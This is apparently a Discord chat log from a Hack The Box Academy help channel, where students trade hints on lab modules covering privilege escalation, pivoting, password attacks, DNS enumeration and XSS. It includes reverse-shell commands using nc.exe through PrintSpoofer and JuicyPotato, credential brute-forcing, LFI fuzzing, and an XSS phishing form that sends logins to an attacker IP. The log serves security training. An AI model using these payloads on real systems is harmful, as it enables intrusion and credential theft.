#modules

Ive connected to a tunnel, but I cant seem to get access to the website

I get an error that says my connection has timed out

can anyone help with a nudge on white box skills assessment.. I think I may be in right direction but not sure

Whitebox is a tough one, which bit are you stuck on?

@pine dagger Whitebox is your game💪

I'm in the "getting started" module and the "privilege escalation" section. I have copied root id_rsa but I get connection refused error when I try to login.. I tried copying the id_rsa file and I got prompted for the users password of which I don't have

I wouldn't have passed it without your help ❤️

We worked together, bro!

can someone help me im stuck in tier 2 archetype i cant wget the nc64.exe

start of skill 😭

try -i and pass it the filename. Also make sure its got the correct permissions.

"????

Need to look at the source code and look for what functions have a vulnerability in one of those functions. You're looking for ones that take inputs in particular (which should narrow it down). Once you've narrowed it down, take a look at what inputs they accept, and try and get them to take the correct input first. Then once you think you've got it, then start looking at how to inject.

I have done that but it still seem not to work, ssh root@IP -i id_rsa

can someone help me?

I tried copying the id_rsa file to my local machine but I was prompted for the password for the user2 account of which I don't have..

appreciate you 😃

why am i being ignored

Because no one has any clue what help you are looking for. You've not provided any context of module, chapter, and question where you are running into problems.

Is the id_rsa file for that username?

tier 2 archetype https://discord.com/channels/473760315293696010/1140959071634194504

You're asking about a box?

yes

nope, it's for the root user but user2 have read access so I copied it to user2, tried logging in from there but no success

Then try #boxes. This channel is for HTB Academy.

no access

Probably need to link your HTB account with your Discord account.

how

i was doing it the whole time, but no end to the pages and cant find anything interesting in the sources

Read #welcome

I don't follow what you're doing. The key in the id_rsa file is linked to a particular user.

it wouldnt matter if you copied to a different user, it can only be used to authenticate the original user.

huys i have a question

i am in the module https://academy.hackthebox.com/module/34/section/1873

and i read this specific article

https://www.makeuseof.com/what-are-disassociation-attacks/

and my question is in this video

https://www.youtube.com/watch?v=qJzhe1r_bK4&t=318s

i not understand much english but they are trying to say that device can be deautenticated depdending of the version of the wireless device ?

hey anyone done with keeper machine ?

Wrong channel. You probably want #boxes

it says u dont have access ?

Read #welcome

i solved, the answer is yes

depends of the version of the access point

Hi, did anyone complete the AD Enumeration & Attacks module??

Yes 👋

can I dm? I'm finishing the last exam but there's an underlying issue which I cannot figure out, I mean with bloodhound there's something wrong

(I'm not asking for any solution to any question, it's a mechanical issue)

Yea welcome to Dm
I'm very new to the bloodhound tho

Well basically, all the users I get can connect in rdp to MS01. Now my problem is that if I didn't boldly attempt to connect, what the fuck is going to tell me that I have the righ to do so?

Not even bloodhound showed that I could connect, and I'm not a local user, I'm using a domain user for connection

Is the lab broke??

On a prior occasion (exam part 1), my user was even admin on the ms01, yet no enumeration showed that!

Don't think so, maybe it's how your filtering it? Path? / your starting point / end pint

Discuss pm I still have it loaded I think

not even if I use starting point my user --> ms01 I get an edge

Is anyone here a professional pentester with experience on BloodHound????

Just signed up and started in htb academy, any advice? thank you

Take lots of notes

for an example? like cheatsheets or somthing?

Like literally write down notes on what you're learning

Alright, thanks

#resources-tools message

if you can't access that verify your account

thank you

Hi everyone. Could someone who’s done the CPTS Firewall and IDS/IPS Evasion Medium lab DM me please? I’m stuck and would like some directions

Nmap module yes?

Yes

Have you tried using discords search featur

Many people have asked and have been given nudges

No, good point. I’ll try that

Thank you

It is really just that? I had to use the pwnbox instead of my own VM? I felt sooo bad for not being able to resolve this simple thing… thanks a lot @fathom pendant

Np

ATTACKING COMMON SERVICES - Attacking Common Services - Easy

inlanefreight.htb. not found: 3(NXDOMAIN) is what i get whenever i try to enumerate the domain. I've added the domain/ip to my /etc/hosts

What did i do wrong?

Still need to specify ip with it

working on Windows Privilege Escalation Skills Assessment - Part I and cant figure out why i cant find the ldap admin password .. i got a reverse PS shell as iis and have tried many search commands can can not find it. i am using commands like this Get-ChildItem -Recurse -Include *.txt,*.ini,*.cfg,*.config,*.xml | Select-String "password" | Select-Object -Property Path any hints?

Attacking Common Services - Easy. I have found a user, but I am struggling with getting their password. Used hydra to bruteforce smtp and ftp with no results. Saw rockyou.txt was given on here but that takes 2000hrs to finish. Any help would be appreciated

Increase threads

That's at 64 threads

hey hacker fam, i got the answer to the question but i didn't do the task required of me to do so. i'd like some help if yall can provide some assistance. attached is the question

this is the section i'm in

With no un/pw, I used ncrack to find them. Also, I didn't use rockyou.

hey guys, I'm stuck in "Attacking Common Services" : "Attacking DNS"
I use "subbrute.py " but I'm getting error massage regarding the code & IndexError: list index out of range

I guessing it's not suppose 2 be like this...
I"m not sure what 2 do next ....

I have the username, but still says the password is not in my wordlist for ftp and it won't even attempt smtp. What wordlist did you use?

for my run, this worked for me. 2020-200_most_used_passwords. Not sure why the ones from resources didn't.

I get timeouts quite a bit , so I may have just tried something else that didn't time out.

That wordlist had it. Thank you very much

Hi,

I have a dumb question: is nmap with -sC -sV --max-retries 1 considered safe (will it destroy anything?) running in a production environment? (:

On free account, we have 70 cubes (cmiiw), is there a way we could have more than this besides from subscription?

It shouldn't break anything

Guess No ....

Utilize the discord search feature: other people have asked the same question

Follow the instructions the module tells you, but you might need to do a little further digging than what they ask

Not much to assist with here

I read the whole module and do not get ANY of the questions. https://academy.hackthebox.com/module/58/section/517

Go do the SQL injection fundamentals module and come back to this. If it still doesn't make sense, go to ippsec.rocks, search sqlmap, and see the tool in action.

thanks I did do that module I guess I will look into those

I have been limiting myself mainly to hackthebox acadamy

There are many people who have already completed this module with little to no problems, so the first step is actually identifying what it is you're actually not understanding, instead of saying "I don't get any of it"

• Is it the use case you don't understand?
• The command line parameters?
• How you would get past a WAF with it?
• What the tool is actually doing?
• What the prompts during the command actually mean?

thanks

I will just watch all of the sqlmap videos from ippsec

OMG

that is some illegal writeup you got and if you need help with room this isn't the right place to ask

also just google

Hey guys, i´m doing the DNS Footprinting module. Does anyone have a hint for me wich wordlist to use, so enumeration doesnt take forever?

i am working on windows priv esc 1 still , i am having a difficult time. so far i found a reverse power shell i can get with user iis through a web interface exploit. I have a metasploit session that picked up the session using exploit/multi/handler but i cant seem to get any of potatoes to work to get me elevated priv on the box... i still have not found the ldapadmin password but thought maybe my search would work better if i was elevated... does anyone see some error in my method or can help figure out why i am having trouble in metaploit with the potato methods?

i have also tried to use the printspoofer method manually (outside of metasploit with no success)

|| The module is testing your patience.||

ITS RIGGED

Take the smallest list in Seclists. If you don't find anything, use the next larger list.

Module : Pivoting, Tunneling, and Port Forwarding

Meterpreter Tunneling & Port Forwarding

Hello all,

I try to use msf with socks_proxy but it get stuck at :[*] Starting the SOCKS proxy server
If i Ctrl+Z it close msf and I have to kill-9 the process cause its running on the back on the port 9050

I manage to finish the page without that, but i still want to understand why it did not work

You're on the right track. When in doubt, I like going to an ippsec video or 0xdf writeup where they use the exploit/privesc I'm trying to use and see if they do things any differently.

It's a skills assessment, so I don't want to say anything more than that.

sry for the late reply, did u figure it out?

"# copyright info keeps popping up in my ffuf output. How can I stop this?

Check the List
I think there's that kind of content in there.

hello guys, quick question regarding module Attacking Passwords section Pass The Hash, the last question it is saying that you can't connect to DC01 from anywhere except MS01, idk if I understood that correctly, but it appears that u literally cannot pivot from MS01 to attempt to connect to DC01, I tried chisel, ssf, rdp, nothing is working out.
Does anyone know if it can't be accessed from anywhere except MS01 at all or can I open a tunnel and pivot from there?

PS: I'm regoing over the module so i already solved it, but if i remember correctly i rdp'ed from MS01 to DC01

its ok, and no i didnt, i saw the source of admin index, i saw that the log parameter is located in logs file, tried to access to access.log and error.log but didnt work

did u try fuzzing for an LFI payload?

yes i did, no hits, at the new parameter and at the $$$_admin dir

let's go backtrack ur progress a bit.

^^

You fuzzed the index.php for parameters right?

You found a paramater that was available, You tried reading the src code of the files.

yep

you found a new directry in the source code.

you went to that directory and got welcomed with an index.php

u tried fuzzing that file, you found a vulnerable parameter.

Then u tried fuzzing that parameter but got no hit?

exactly

did u try system.log directly as input?

yes, all logs that provided by the page give the same main page

@acoustic owl lol i feel dumb. fixed it .thx for answering my question again.

weird tbh

what wordlist did u use for fuzzing?

and btw since u got to this point, u only have 2 steps left to finish everything :)

u mean for fuzzing LFI? its seclists/Fuzzing/LFI/LFI-Jhaddix.txt

did u filter size and everything?

ffuf -w ~/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.48.48:34531/index.php?l$$=FUZZ' -fs 15829

tried both parameters

u removed the vuln. directory from the command?

You can pivot using MS01 as a jump box. Saying "you can't connect to DC01 from anywhere except MS01" is just to say you can't access DC01 from your attacking machine.

its already provided from the source code, and i tried it anyway

I Tired everything but it doesn't seem to workout, followed guides by the word. Idk I'll get back and try with it again.

when i try to use printspoofer im getting this error: COM -> recv failed with error: 10038,
i tried multiple numbers after the -l flag and all gave the same error, is there anything i can do about it?
this is in windows privesc part1 and for reference im using this command:
||.\PrintSpoofer32.exe -c ".\nc.exe 10.10.14.10 9001 -e cmd"||

ffuf -w ~/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.49.11:41153/index.php?l$$=l$$s/FUZZ' -fs 15829

If PrintSpoofer doesn't work, try a different exploit for that user privilege, or play with the PrintSpoofer flags if there are more

check ur dms

Okay tbh I'm out of ideas here.
I tried running a reverse chisel server:
attackBox: ./chisel.exe server -p 8000 --reverse
MS01: .\chisel.exe client ip:8000 R:socks
My proxychains conf:
socks5 127.0.0.1 8000

Is anything wrong with this that i

I'm not catching**

i confused juicypotato with printspoofer.
the error message i sent is from juicypotato.
this is the command im using for reference:
||.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c .\nc.exe 10.10.14.10 9001 -e cmd.exe" -t * ||

on printspoofer i get this error: [-] Operation failed or timed out.
with this command:
||.\PrintSpoofer32.exe -c ".\nc.exe 10.10.14.10 9001 -e cmd"||

im trying to abuse SeImpersonatePrivilege

Again, if they don’t work, fiddle with the flags

It’s a skills assessment, so I won’t give away the answer that easy

alright

subdomains-top1million-5000 and 20000 didnt work so far. Am i doing something wrong or do i just need to wait? I mean i get results, but just not the one i need

I told you to take the smallest list 😉
5000 entries are too much

can someone give me a help? I'm in the PASSWORD ATTACKS Credential Hunting in Linux module, I found the password for the user "kira" but I didn't find anything else, I couldn't upload firefox_decrypt.py to the machine, does anyone have any tips?

but we are talking about seclists right? I feel stupid 😄

Yes, Seclists
Not every list shows you in its name how many entries it has.
Look at the file size

I will give some other another try, thanks for now 🙂

anyone?

But "dnsenum --dnsserver 10.129.12.123 --enum -p 0 -s 0 -o subdomains_4.txt -f /usr/share/wordlists/seclists/SecLists-master/Discovery/DNS/[wordlist] inlanefreight.htb" ist correct right?

You want to bruteforce inlanefreight.htb?

If so, why?

Hi i am in the same position in SOCKS5 Tunneling with Chisel
server and client are well connected, but i cant xfreerdp on 172.16.5.19

I thought thats the way to find the fqdn for the IP ending with 203 🤨

There are DNS zones that voluntarily give out all data with a zone transfer.

Only if a zone does not allow zone transfer, you have to bruteforce them

Anyone got c programming projects I could work just for fun?

OK i see, i was on the wrong track then, thanks for the hint

Plz

This isn't the place to ask, start a thread and ask in #1024429874246590575

If I unlock a 500 cubes module which shows +100 cubes on it, will I get 500+100=600 cubes upon completing that module? Or just 100 cubes?

Ok

You will only get 100 back. You will never get more than you pay

Oh okay. Thanks!

All modules give back an amount proportional to their tier

For instance tier0 are considered "free" bc they give back what you pay (10)

Understood. Thanks a lot for explaining in detail 🙌🏻

There's a help article that explains it if you wanna look it up

can i have any help ?

yo anyone can help out with nosql injection SA 2?

Are you using proxy chains? That module is very much follow step-by-step

yes i am using proxychains
my command is : proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
and proxychains4.conf is set to : socks5 127.0.0.1 1080

Comment out the socks4 line that was set up previously

Is there a reason / methodology for like randomly choosing "AppReadiness" in WindowsPrivEsc
Like in an actual box, how would we randomly know what box to choose, just finding one with SYSTEM?

yes i did that

What's the error?

anyone?

One sec

And you're following the section exactly?

Yes

I feel like there's a missing step

How are you trying to upload it?

It means you get to change service settings as you wish (iirc), so anything running as system is good

My notes (from a while ago) say finding a url dev.inlanefreight.com has something useful

I can't really read my notes but

Although probably best to pick a service that you’re okay with having crash if you mess it up

Understood, appreciate it ❤️

I think you're looking at the wrong thing or replied to the wrong person

i uploaded firefox decrypt

Right person 🙂

Could be wrong notes

Wrong notes lol this is password attacks related

And what is the error you're getting if it's not working

Yes I did, i just did again to be sure, not working...

Try python2.7

not found

When I am attempting to install theHarvester on Parrot HTB VM I get the following error - has anyone ran into this and know a solution for a fix? I have googled it and tried a bunch of fixes that did not work

I don't have access to a computer to verify for you

Switch to the pwnbox and upload that one, iirc firefox_decrypt had a recent update that requires a newer version of python that isn't installed in the lab env

@fathom pendant Do u have an idea of what i can do ?

No idea ATM don't have access to run through

And double check

I restarted the server and my machine..

Sudo apt update and sudo apt upgrade

I have run both of those

sudo apt autoclean

Also parrot doesn't currently have python3.11 repo

sudo apt install -f

One more question if previous guy is still here - For windows priv esc, regardless of how, but after getting user account to localadmins, I can only figure out how to access Administrator after sign out and reconnect - gpupdate /force doesn't seem to trigger a administrator update access - any ideas?

It's supposedly in the works

I just downloaded firefox decrypt from github that says in the module

Yes I know. Pwnbox has an older version, or should have an older version, that you can upload

still the same error, i did everything from beginning

Try
locate firefox_decrypt.py

In the lab can you do which python

Or can you specify in the lab python3.9

cant you just go around that with updatedb? This should update locatedb for you

This is more demonstrating an issue than it is with not finding the tool

hello, i was just wondering what was the difference between a vhost and a subdomain?

i dont seem to grasp what a vhost really is and why it is different from a public dns record

`In many cases, many websites would actually have sub-domains that are not public and will not publish them in public DNS records, and hence if we visit them in a browser, we would fail to connect, as the public DNS would not know their IP. Once again, if we use the sub-domain fuzzing, we would only be able to identify public sub-domains but will not identify any sub-domains that are not public.

This is where we utilize VHosts Fuzzing on an IP we already have. We will run a scan and test for scans on the same IP, and then we will be able to identify both public and non-public sub-domains and VHosts.`

do we need to be in the same network in order to vhost fuzz or just need to know the original ip? or this doesnt matter?

Doesn't matter, its describing some of the limitations of a lab based network

rthen what is the difference between a vhost and just a normal subdomain, and why do i need to change the command parameters

in a lab vhost fuzzing and subdomain enumeration can achieve the same goal, but in the real world they can potentially find very different things

a vhost is a subdomain or a domain that sits on the same web server

whereas a subdomain doesnt necessarily have to be the same computer at all

vhosts are how shared hosting services work for example

where you can have hundreds of websites with no relation to each other all sitting on the same IP

ok so when i do the host header im saying to the server to stay on this same server and not switch

not necessarily

it depends on how the host is resolved

but the host header specifies which resource you want, and a web server that resolves for that host will internally redirect things appropriately

ohhhh

ok so like its a bit like instead of redirecting through the public dns, they use their own "DNS" server and redirect me?

# Ensure that Apache listens on port 80
Listen 80
<VirtualHost *:80>
    DocumentRoot "/www/example1"
    ServerName www.example1.com

    # Other directives here
</VirtualHost>

<VirtualHost *:80>
    DocumentRoot "/www/example2"
    ServerName www.example2.org

    # Other directives here
</VirtualHost>

like this vhost configuration is saying that for the www.example1.org host to serve the files located at /www/example1

wheras the wwe.example2.org host has its files served from/www/example2

yep

same server

this COULD both be example.org and just have different subdomains like www or sales or whatever

yep

but its different than DNS because DNS has already happened before it even hits this configuration

yep

Think of a city block full of offices. When you think of vhosts, think of all the offices on that block as being on the same vhost. They could be owned by the same company, or they might not be (hosting providers). When you think of subdomains, that office could be on the same block as the main office, or another block entirely.

alright makes sense, (from an attack perspective), its just a different way of requesting for a specific resource

i understand the whole vhost same host and subdomain diffrent hosts

but like the tool itself holds different results as it "asking" in a diffrent way of finding 1.example.com and 2.example.com

if i undertsand correctly

VHosts may or may not have public DNS records, so in order to access your site, you may need to change host names and addresses on your localhost (typically located in etc/hosts) or use the Host: header of a standard HTTP request.

When you look for vhost, you're looking for every office on that city block. When you look for subdomains, you're looking for the branch offices no matter which block it's on, but not getting the info of what's on those other blocks other than branch offices*.

ok i understand now thank you very much, i hope this enlightens more people

No problem!

Can someon help me,

What is the ObjectAceType of the first right that the forend user has over the GPO Management group?

I have found the right on bloodhound but its not accepting the answer?

then dont use bloodhound

Can someone give me a hint with this question "Enumerate the IMAP service and submit the flag as the answer. (Format: HTB{...})" from IMAP enumeration? https://academy.hackthebox.com/module/112/section/1073

The powershell command is returning nothing

yes it does, wait. Takes awhile

if its the one im remembering

will leave it for a bit then

What have you tried

#modules message

I have logged in to the IMAP server with openssl. After that, I identified 4 INBOX. Two seems to have emails but I cannot retrieve them somehow

Have you tried 1 fetch 1 body[]

Or using an email client

I have tried 1 FETCH 1 ALL, but it returns the same error as yours "1 BAD Error in IMAP command FETCH: Invalid messageset (0.001 + 0.000 secs).
"

Ah

I just checked the question

Iirc the flag for this is something you'll see when you connect

Because you probably didn't select the inbox first

yes I have selected inbox

Then that flag isn't in inbox

0 Exists

Do the list command

But also this answer is in the banner

The email one is the last question

Tried the same command in all the inboxes

No. You didn't lol

Because one of those has the answer

Again you're close

Found the flag in the banner thanks

This is the path for the last question

Also as I said 1 fetch 1 body[] will be more useful than 1 fetch 1 all

Ok let me tryt

Just need to select the right one

I guess the mail must be in Dev o Dev.Department?

`1 list "" *

• LIST (\Noselect \HasChildren) "." DEV
• LIST (\Noselect \HasChildren) "." DEV.DEPARTMENT
• LIST (\HasNoChildren) "." DEV.DEPARTMENT.INT
• LIST (\HasNoChildren) "." INBOX`

Well only two of them don't have the \Noselect flag

or take my route and try em all and see what happens

trying things and seeing what happens is OP

I mean you literally can only select 2 of the things listed

I think it is bugged? Status says it has 1 message but when selecting the inbox it says 0 exists

No you're just dumb, when you did "inbox" in your select, you switched back to the normal inbox [which is empty]

The command is technically 1 select [folder]

Oh

Inbox is just a folder, not a classification

Thank you a lot XD

I was going crazy hahah

Also if you use the fetch 1 all command; you're likely to get a bunch of NIL

#modules message

I'm trying to work on one of the starting-point machines and I'm supposed to go to an ip address in my browser but it's not working

I'm connected via openvpn

you probably have to add it to /etc/hosts

does it look like this : "example.htb"

no it's just xx.xxx.xxx.xx

does it start with "10."

yes

can you send me screenshot of web server response

via my dms ill check it

are you wanting something outo f the network tab in the dev tools or something from the cli or a screenshot of the browser?

Currently on the SQLMAP Module at "Attack Tuning", while I understand the Prefix / Suffix Flag, I do not understand how I should find the proper prefix / suffix to add? I thought the whole point of SQLMap was to find those for me?

screenshot of the browser so i can see what issue you get

Module : Pivoting, Tunneling, and Port Forwarding
Skills Assessment

hello all
I am stuck in the last question, i have no idea about what to do

Pivot from the initial target to the system that's the domain controller

Or can connect to it

How can I find the DC ?

Well once you're on the first target: ping sweep

Yes i did that, there 2 IP i can not connect to x.x.5.15 and x.x.6.45 but I dont think that the DC, am I wrong ?

Only one way to find out :)

Looking around is the easiest part

I tried to connect to, but it didn't make it

Well you might need creds

i have the creds of ||vfrank ||it s not enough ?

I dont have good notes on this

But just keep moving forward

thx you for the motivation

I did not look on the drive Z 🤦‍♂️

Anyone completed the final labs of the Footprinting module? Stuck on the medium lab...

hey can anyone dm me to try and get responder working i am having a bit of a breakdown over it i have been stuck for 6 hours 😦

it won't grab the hash

Hello

Module - broken authentication - predicatable reset tokens

I need some help with this module. My code "works" but I cant get the right token. I believe its my time.

Could someone give me some assistance with this? Python is what im using to send the request

Can someone help me out. How do I transfer files using xfreerdp? I feel really dumb lol

Just xfreerdp as usual and add drive

With my session open on my attack box, isn't there way to send files that way too?

U can make python server in attacker command

And in xfreerdp, open browser <tun0>:8000/urfile

TY

Can someone please give me a hint on how to view the contents of \DC01\david.txt {password attack module}

I've obtained his hash using mimikatz and logged into his account. But I can't read the contents due to permission issues.

Already finish this, but let me remember, what section ?

Pass the hash

oh

when u xfreerdp david got permission issue ?

have u enable restricted admin ?

Hello everybody, as manny of yours i'm a newbie. Hope from now learn faster

Alright, can someone walk me through how to transfer this lazagne tool please. I have found all the answers except this question and it is driving me nuts

like i said, u can use xfreerdp /drive:C/,<ur-attacker-dir>, or with browser

I was able to get the lazagne on the remote host, just trying to figure out how to run it

start lazagne.exe all

im facing with hard lab aslo, always force close

Hello everyone,
In Information Gathering - Web Edition->Active Subdomain Enumeration,
In the question 'Submit the number of all "A" records from all zones as the answer. ',
I found the answer but 'inlanefreight.htb' is not a "A" record ?
Thx in advance

I got it!

can anyone help on a section from win priv esc?

Hey guys I am new to the server and new to ethical hacking. I can only use the command prompt to ping the ip of a server of a website and using grabify or a link to track url or use commands like netstat -an, or tracert the ip of the website server. How do I find the ip of someone?

Check the log files from the server.

Which section, what have you tried and what does not work?

Hi, it's from "Windows Built-In Groups". Dumped the NTDS and got the password for Admin, but running runas gives me wrong password?

Is this the question?

Leverage SeBackupPrivilege rights and obtain the flag located at c:\Users\Administrator\Desktop\SeBackupPrivilege\flag.txt

yes

and what exactly did you do?

Dumped the NTDS and got the password for Admin, but running runas gives me wrong password?

hashcat, etc.

unless this is not the intended way and i should rdp?

Why?
The task is
„Leverage SeBackupPrivilege rights and obtain the flag“

just copy using copy-filesebackuipprivilege?

🤦🏼‍♂️

Read the Section again 😉

guess i went too deep

thanks 🙂

Module: Intro to Assembly Language
Question: Add an instruction at the end of the attached code to move the value in "rsp" to "rax". What is the hex value of "rax" at the end of program execution?

global _start                               
section .text                       
_start:                                
    mov rax, 1024                   
    mov rbx, 2048                   
    xchg rax, rbx                   
    push rbx                        
    mov rax, [rsp]

not sure whats wrong with my code

It's moving the value in rax, you don't need the braces

[rsp] is getting the value located at the address specified by RSP

I have tried removing the brackets same thing

hm, not sure then, could be something with how you're supposed to write out x86, I haven't done the module yet

yea Im new in assembly so not sure whats going on

are you recompiling everytime you make an edit?

yea

I got this but its not taking the answer

I just realized the module is tier 3 so I don't have access to it, probably make sure you give the answer exactly how they do it in the example

could be the difference between 0x400 and 0x00000400

lol

it worked

+rep

that'll do it

hi i'm stuck in password attack lab hard, already got Johanna passwd.
try xfreerdp and cred hunting didn't get any creds, just saw user ||david||,
try brute force that user SMB | RDP already one hour didnt get passwd.
should i back to cred hunt or continue brute force ?

already try LaZagne from linux but got blank screen, try existing Lazagne in window target force closed

did you get the One piece, Shanks?
have you had a cyborg's right hand, Shanks?

Be sure to take a good look around for things once you gain some creds and can login to a user's account.

hi

Yes heey @twin portal

Please I need some tips on an active machine but it looks like this isn't the right place to ask my question and it seems I don't have permission to send messages

read #welcome and #rules after that use /verify at #bot-commands and ask that in #boxes

hi, the python script parsing not correctly wordlist, on broken authentication module- Default credentials part. Can someone check this?

+1

thanks

Hi guys, I’m stuck on the last 2 questions of AD Enumeration and Attacks Pt2. I’m currently on MS01 in a power shell session as CXXXX and I’m trying to figure out a way to go from here. I know this user has GenericAll enabled, so my thinking is to maybe make another user who can winrm to DC01? Would anyone mind giving me a nudge please?

I’m also having trouble getting PowerView to work on MS01, so I’m wondering if it’s my error or if it’s disabled on the box

Hi guys, I just finished "Attacking Common Services- Easy" || using MySQL & SELECT "<?php****
went 2 URL used "find" command 4 the flag.txt & used "type" 2 get it content.||

but I was wondering R there any other ways, if some 1 can please help 2 upgrade my arsenal ...

Nvm I had a brainwave!

Hey guys i could really need help on the DNS Footprinting Module, been stuck here for 2 days now one the last question:
I tried to find the name with AXFR Zone Transfer, i tried bruteforcing it with dnsenum and 7 different wordlists, i have no clue what i´m doing wrong.

Host .203?
First, you have to find all the zones in this task.
Blindly bruteforcing the server does not help.

Question 2 I ran Crackmap command ...crackmapexec smb 10.129.141.167 -u jason -p /home/kali/Downloads/Attacking_Common_Services/pws.list
but got nothing ... https://academy.hackthebox.com/module/116/section/1167

Try to find the argument that will allow you to do local auths

Somewhat like this right: dig axfr inlanefreight.htb @IP ?

but I didn't specify a domain

With this you will do a zone transfer.
Not all zones allow a zone transfer from everyone

Then you mean this: dig any inlanefreight.htb @10.129.14.128 ?

No, you are supposed to find all zones.
With this you ask the server to give you all data of the zone. Whether it does or not depends on its configuration.

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

https://www.cloudflare.com/learning/dns/what-is-dns/

I don´t get how i do that, i´m sorry maybe i´m just to dumb to understand it.

The zone inlanefreight.htb allows a zone transfer and thus gives you all data voluntarily.
But the host you are looking for is not there. This means that there must be at least one other zone.

Find another zone and query it. Does it contain the host you are looking for? If not, there must be another zone.
Remember, not every zone allows zonetransfer from everyone.

Traceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/GetUserSPNs.py", line 51, in <module>
    from impacket.ldap import ldap, ldapasn1
  File "/usr/local/lib/python3.11/dist-packages/impacket/ldap/ldap.py", line 41, in <module>
    import OpenSSL
  File "/usr/lib/python3/dist-packages/OpenSSL/__init__.py", line 8, in <module>
    from OpenSSL import crypto, SSL
  File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 3279, in <module>
    _lib.OpenSSL_add_all_algorithms()
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: module 'lib' has no attribute 'OpenSSL_add_all_algorithms'

If GetUserSPNs has bug, you could try to fix it like this...

@acoustic owl Yes i understood that so far, but i don´t get how i find the other zones. That´s the only issue if have atm. If i know how to find other zones, than i can query them, and see if the host i´m looking for is in there. To me it´s just not clear how i find the other zone(s).

Try this https://github.com/Lupoxoox/automatic_ffufer.git

If you have read the link above, you know that DNS are divided into zones.
This means that each subdomain can theoretically be a zone.

Hello, I am currently in the XSS Basics module in the Phishing section. While doing the exercise and following along, in the “Login For Injection” and “Cleaning Up” subsection, the following does not get rid of the URL entry form and I am unsure as to how to fix it to get rid of the URL form.

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

I was able to do the login form injection by modifying the method using '> to comment out the img tag and then just injecting the raw HTML instead of minifying it and commenting out the end with <!–. I feel like minifying it should make it easier, and would like to understand how to do it using that method. Already tried googling many things. Might need to just take a break to let it all sink in. Thanks for any guidance you can provide.

It's about DNS, not ffuf

sorry i wanted to reply to a message about ffuf but i put it here sorry again

Yeah like blog.example.com and shop.example.com right? So i find all the subdomains of example.com and query all of them with dig axfr example.com @IP i should find all hosts right?

Only if each zone also allows a zone transfer. Otherwise not

any zone that does not allow zone transfer, you must query manually or with automated tools.

however in the script I shared there is an option to search for subdomains if you need it
using ffuf as can also be seen in the attacking web app with ffuf module

So i first have to run something like gobuster to find all subdomains, then query every single one of them to see if they allow zonetransfers and if i dont get the host im look for, i have to bruteforce those ones?

No
Make a zone transfer of the domain inlanefreight.htb
You will get all subdomains in this zone.

Then consider which of these subdomains could be a zone and query them.

Be sure to read up on DNS so you understand exactly how it works.

But if a subdomain is in another zone would the zonetransfer of inlanefreight.htb still show it?

A successful zonetransfer reveals all data of this zone

So if you do a zone transfer to example.com and it is successful, you will get data like
ns.example.com
www.example.com
zone1.example.com

zone1 could be a zone of its own. You can query it right now.
If the zonetransfer is successful, you will get data like:
ns.zone1.example.com
www.zone1.example.com

Ok i think i understand now. My first zonetransfer of inlanefreight.htb gave me this. And now i do zonetransfers of all subdomains to see wich doesnt allow zonetransfers and those i have to brute force. I´m really sorry to take up so much time and effort from you.

here for example internal allows zonetransfers, but doesnt have the host im locking for so i try the others

If the zonetransfer is not successful, this zone may not allow zonetransfer from anyone.
Then you can still query this zone manually.
Like so

dig ns.zone1.example.com @nameserverip

This means that there must be other zones

Like dev. and app. or am i on the wrong track again?

Ok i really was overthinking it then. Thank you.

who own the keeper machine

i need some hints

There is a channel for this box

#1139981418164920464

No access

hint from me, dont overcomplicate and really look into everything you find

what did you try so far and what did you find?

yeah i find a servie version is 4.4.4

i,also find vulnerablity but not able to find any exploit

Read and follow #welcome

Dont overcomplicate stuff, not everything needs an exploit

means i,m missing that somethin important

This box rewarded me for just looking at a lot of things

okay i,m searching by the way i,m script kidde now that time i,m thinking

should i try directory bruteforcing

Have you found a site yet?

yeah

it,s

»|« RT 4.4.4+dfsg-2ubuntu1 (Debian) Copyright 1996-2019 Best Practical Solutions, LLC

i found login pannel

Then look for what you can do with the login panel. Really dont overthink stuff

just bypass that login pannel

using burpsuite

Sometimes you dont need tools or skripts, cant tell you more then that.

so u mean i want to inspect the code

in client side

read #welcome and #rules after that use /verify at #bot-commands and ask that in #1139981418164920464

bro u own that machine

Im on 'login bruteforcing' and when I use cupp to generate a password list it says 'william.txt' is where the dictionary is saved, but when I search my filesystem for william.txt it says does not exist. Why is it doing this?

first it's a box not a thm machine second nope and the box owner is on the box page

also don't dm the box's create begging for hint just ask your question in the appropriate channel

okay but the point is that

what i can do with login page

without using anytool how i can bypass

which section are you on? also after inputting all of the info does the tool say something like outputed: (file name) or something?

also pls stay on topic of this channel if not you will get the 👢 from one of the mod

You should ask in #1139981418164920464
If you have no access read and follow #welcome
This channel is for questions about modules from the Academy

read #welcome and #rules after that use /verify at #bot-commands and ask that in either #general or #1024429874246590575

Thank you, my apologies.

yes for both x)

Is there a yearly silver student plan for the Academy? that's comparable to $8/m for students.

I mean, that's based on $8/m for students

who own keeper flags

Yeah 🤣

One piece fan

a lot! are you

@autumn pilot if you are here could give this spamming clown the 👢 (* on all 4 academy channels)

can anyone help me with this? 🙂 https://forum.hackthebox.com/t/login-brute-forcing-child-with-pid-xxxx-terminating-cannot-connect/294985

i've deleted his messages there, if he really needs the hint for that machine, then he will need to verify and ask in the appropriate channel

i,m new here

so i dont have an idea to use that

Haha, gomu gomu no....

well, if you haven't skipped the onboarding when you joined, you would have an idea what do to

go to #rules and then #welcome , and when I'm saying go there I mean go and read

@autumn pilot there’s a message in #858470491676737536 too

section password attacks module Protected Archive i'm getting this error when i try to use zip2john.py line 1 ELF SyntaxError: source code cannot contain null bytes .

a google seach says this fixed it sed -i 's/\x0//g' FILENAME

however, not working for me.

any idea what i can do to fix this error

and i can't put zip2john in an interpreter because its a binary to crack protected archives

#bot-commands as well, if no ones noticed

when i use python2 i get this error coed

i've been trying that

try with just zip2john (without python2 or 3)

i get this error

let move this to dm like always

@autumn pilot

💀

why do so many people go to white hat discords to ask for black hat stuff

